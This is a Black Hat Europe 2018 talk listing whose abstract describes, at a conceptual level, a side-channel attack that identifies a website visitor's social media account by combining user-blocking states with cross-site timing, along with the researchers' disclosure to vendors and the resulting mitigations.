I Block You Because I Love You: Social Account Identification Attack Against a Website Visitor

Presented at Black Hat Europe 2018, Dec. 6, 2018, 11:15 a.m. (50 minutes).

In this talk, we present a practical side-channel attack that identifies the social web service account of a visitor to an attacker's website. As user pages and profiles in social web services generally include his/her name and activities, the anonymity of a website visitor can be easily destroyed by identifying the social account.

Our attack leverages the widely adopted user-blocking mechanism, abusing its inherent property that certain pages return different content depending on whether a user is blocked by another user. Our key insight is that an account prepared by an attacker can hold an attacker-controllable binary state of blocking/non-blocking with respect to an arbitrary user on the same service. This state can be retrieved as one-bit data through the conventional cross-site timing attack when a user visits the attacker's website. We generalize this property as "visibility control," which we consider to be the fundamental assumption of our attack. Building on this primitive, an attacker with a set of controlled accounts can gain a flexible control over the data leaked through the side channel. Using this mechanism, it is possible to design a robust, large-scale user identification attack on social web services.

We performed an extensive empirical study and found that at least 12 are vulnerable: Facebook, Instagram, Tumblr, Google+, Twitter, eBay, PornHub, Medium, Xbox Live, Ashley Madison, Roblox, and Xvideos. The attack achieves 100% accuracy and finishes within a sufficiently short time in a practical setting.

We have shared details of this attack and countermeasures with service providers and browser vendors. Then, Twitter and eBay have been able to prevent the attack by changing their implementations. In addition, the "SameSite attribute" used for cookies has been added to some major browsers such as Microsoft Edge, Internet Explorer, and Mozilla Firefox.


Presenters:

  • Takuya Watanabe - Security Researcher, NTT
    Takuya Watanabe received a M.E. degree in computer science and engineering from Waseda University, Japan in 2016. Since joining Nippon Telegraph and Telephone Corporation (NTT) in 2016, he has been engaged in research and development of the cyber security project.

Links:

Similar Presentations: